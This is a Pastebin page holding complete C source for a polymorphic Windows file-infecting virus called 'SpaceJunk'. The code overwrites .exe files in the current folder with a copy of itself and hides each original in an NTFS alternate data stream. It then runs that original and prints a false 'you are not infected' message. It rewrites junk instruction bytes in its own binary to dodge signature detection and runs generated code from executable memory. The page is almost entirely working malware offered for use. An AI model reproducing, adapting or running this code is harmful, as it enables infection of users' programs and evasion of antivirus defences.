Advertisement
FlyFar

SpaceJunk - Polyphormic Virus

Feb 19th, 2023
525
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 5.08 KB | Cybersecurity | 0 0
  1. #include <dirent.h>
  2. #include <stdio.h>
  3. #include <windows.h>
  4. #include <string.h>
  5. #include <time.h>
  6.  
  7. typedef unsigned char byte;
  8. typedef void (*pfunc)(void);
  9.  
  10. /* union for dynamic code generation and execution */
  11. union funcptr {
  12.   pfunc x;
  13.   byte* y;
  14. };
  15.  
  16. #define PUSH 0x50
  17. #define POP  0x58
  18. #define NOP 0X90
  19. #define JUNK asm("PUSH %esi\n\t""PUSH %ecx\n\t""PUSH %edx\n\t""PUSH %ebx\n\t""POP %esi\n\t""POP %ecx\n\t""POP %edx\n\t""POP %ebx\n\t");
  20. #define JUNKLEN 8
  21.  
  22. #define MAX 10
  23.  
  24. char *st = ".exe";
  25. char *exes[MAX];
  26. unsigned char *code;
  27. int codelen;
  28.  
  29. /* function for Dynamic Code Generation and Execution */
  30.  
  31. void dynamic_code_gene() {
  32.   int cnt;
  33.   unsigned char c,reg;
  34.   /* Allocating Virutal Memory which has read write and execute permissions*/
  35.   byte* buf = (byte*)VirtualAllocEx( GetCurrentProcess(), 0, 1<<16, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
  36.   srand(time(NULL));
  37.   if( buf==0 )
  38.     return;
  39.   byte* p = buf;
  40.   cnt = rand()%7;
  41.   while(cnt)
  42.   {
  43.    reg = rand()%3;
  44.    c = PUSH + reg;
  45.   *p++ = c;
  46.   *p++ = c+8;
  47.    cnt--;
  48.   }
  49.   *p++ = 0xC3; // ret
  50.   union funcptr func;
  51.   func.y = buf;
  52.  
  53.   func.x();   // Calling the dynamic generated Code
  54. }
  55.  
  56. /* this function reads Code from a given file name */
  57.  
  58. void readcode(const char *filename) {
  59.   FILE *fp = fopen(filename, "rb");    
  60.   fseek(fp, 0L, SEEK_END);            
  61.   codelen = ftell(fp);
  62.   code = malloc(codelen);              
  63.   fseek(fp, 0L, SEEK_SET);
  64.   fread(code, codelen, 1, fp);        
  65. }
  66.  
  67. unsigned int sum4(int i)
  68. {
  69.  unsigned int sum;
  70.  sum = code[i]+code[i+1]+code[i+2]+code[i+3];
  71.  return sum;
  72. }
  73. /* function to modify the JUNK Code */
  74. void replace_junk(void) {
  75.   FILE *fp = fopen("vir.exe", "rb+");    
  76.   fseek(fp, 0L, SEEK_END);            
  77.   codelen = ftell(fp);
  78.   code = malloc(codelen);              
  79.   fseek(fp, 0L, SEEK_SET);
  80.   fread(code, codelen, 1, fp);
  81.   long int i,j;
  82.   int sk;
  83.   srand(time(NULL));                                
  84.   int c,cnt=0;
  85.   JUNK;
  86.   for (i = 0; i < codelen; i++) {
  87.     unsigned start = code[i];
  88.     unsigned end = code[i+JUNKLEN-1];
  89.     /* finds the pattern and replaces those instruction with some other random codes */
  90.     if(start >= PUSH && start <= PUSH+8)
  91.     {
  92.       if(end >= POP && end <= POP+8)
  93.     {
  94.       if(sum4(i) == (sum4(i+4)-32))
  95.       {
  96.             cnt++;
  97.         sk = i;
  98.         for(j=0;j<4;j++)
  99.             {
  100.               int reg = rand()%8;
  101.           if(reg == 4)
  102.         continue;
  103.               fseek(fp, sk, SEEK_SET);
  104.               c = PUSH + reg;
  105.           fputc(c, fp);
  106.           fseek(fp, sk+4, SEEK_SET);
  107.               c = c + 8;
  108.           fputc(c, fp);
  109.         }
  110.       }
  111.     }
  112.      }
  113.   }
  114.   JUNK;
  115.   //printf("The total count is %d",cnt);
  116. }
  117.  
  118. /* finds Junk Pattern to avoid reinfecting the infected file */
  119. int find_junkpattn(void)
  120. {
  121.   int i,cnt=0;                      
  122.   JUNK;
  123.   for (i = 0; i < codelen; i++) {
  124.     unsigned start = code[i];
  125.     unsigned end = code[i+JUNKLEN-1];
  126.     if(start >= PUSH && start <= PUSH+8)
  127.     {
  128.       if(end >= POP && end <= POP+8)
  129.     {
  130.       if(sum4(i) == (sum4(i+4)-32))
  131.       {
  132.         cnt++;
  133.       }
  134.     }
  135.     }
  136.   }
  137.   return cnt;
  138. }
  139.  
  140. /* get .exe files in the folder */
  141. int get_exes(char *str)
  142. {
  143.   int noofexes,i = 0;
  144.   DIR           *d;
  145.   struct dirent *dir;
  146.   d = opendir(str);
  147.   JUNK;
  148.   if (d)
  149.   {
  150.     while ((dir = readdir(d)) != NULL)
  151.     {
  152.       if((strstr(dir->d_name,st)) != NULL)
  153.       {
  154.        //printf("%s\n", dir->d_name);
  155.        exes[i] =  malloc(strlen(dir->d_name) + 1);
  156.        strcpy(exes[i++],dir->d_name);
  157.       }
  158.     }
  159.     closedir(d);
  160.   }
  161.   JUNK;
  162.   return 0;
  163. }
  164. void infect(int i)
  165. {
  166.  char *buffer;
  167.  int cx,c;
  168.  c = 50;
  169.  buffer = malloc(c);
  170.  cx = snprintf ( buffer,c,"cmd.exe /C \"copy %s tmp.exe > nul 2>&1\"", exes[i]);
  171.  system(buffer);
  172.  cx = snprintf ( buffer,c,"cmd.exe /C \"copy vir.exe %s > nul 2>&1\"", exes[i]);
  173.  system(buffer);
  174.  cx = snprintf (buffer,c,"cmd.exe /C \"type tmp.exe > %s:org.exe\"",exes[i]);
  175.  system(buffer);
  176.  system("rm tmp.exe");
  177.  printf("\nHey Don't worry,You are not infected\n\n");
  178. }
  179.  
  180. /* Junk fun to insert Code randomly */
  181.  
  182. void jun_fn(i)
  183. {
  184.  while(i--)
  185.  {
  186.   srand(time(NULL));
  187.   switch(rand()%5)
  188.   {
  189.    case 0:asm("PUSH %eax\n\t""POP %eax\n\t");
  190.      break;
  191.    case 1:asm("INC %eax\n\t""DEC %eax\n\t");
  192.      break;
  193.    case 2:asm("PUSH %esi\n\t""POP %esi\n\t");
  194.          break;
  195.    case 3:asm("INC %ebx\n\t""DEC %ebx\n\t");
  196.      break;
  197.    case 4:asm("NOP\n\t""NOP\n\t");
  198.          break;
  199.   }
  200.  }
  201. }  
  202.  
  203.  
  204. int main(int argc,char *argv[])
  205. {
  206.   srand(time(NULL));
  207.   int i=0;
  208.   jun_fn(rand()%7);
  209.   char *buffer;
  210.   JUNK;
  211.   buffer = malloc(50);
  212.   JUNK;
  213.   dynamic_code_gene();
  214.   JUNK;
  215.   for(i=0;i<MAX;i++)
  216.      exes[i] = NULL;
  217.   jun_fn(rand()%7);
  218.   get_exes(".");
  219.   i = 0;
  220.   jun_fn(rand()%7);
  221.   dynamic_code_gene();
  222.   while(exes[i])
  223.   {
  224.    readcode(exes[i]);
  225.    if(!(find_junkpattn()))
  226.    {
  227.     infect(i);
  228.     if((strcmp(argv[0],"./vir")))
  229.     {
  230.         replace_junk();
  231.         snprintf (buffer,50,"cmd.exe /C start /B %s.exe:org.exe",argv[0]);
  232.         system(buffer);
  233.     }
  234.         break;
  235.    }
  236.    i++;
  237.   }
  238.    JUNK;
  239.    
  240.    return(0);
  241. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement